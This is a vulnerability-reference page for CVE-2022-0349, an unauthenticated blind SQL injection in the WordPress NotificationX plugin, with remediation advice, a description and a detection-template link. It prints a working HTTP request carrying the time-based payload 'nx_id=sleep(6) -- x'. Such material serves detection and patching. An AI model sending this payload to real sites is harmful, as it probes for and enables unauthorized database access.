🔙 목록으로 돌아가기

CVE-2022-0349: WordPress NotificationX <2.3.9 - SQL Injection

TitleWordPress NotificationX <2.3.9 - SQL Injection
Authoredoardottt
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
RemediationUpdate to the latest version of the WordPress NotificationX plugin (2.3.9 or higher) to mitigate the SQL Injection vulnerability.
CVSS Score9.8
EPSS Score0.58573
CVE IDCVE-2022-0349
CWE IDCWE-89
Tags time-based-sqli cve cve2022 wordpress wp-plugin wp sqli notificationx wpscan wpdeveloper vuln

🔍 Vulnerability Description

WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

nx_id=sleep(6) -- x

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0349.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0349.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A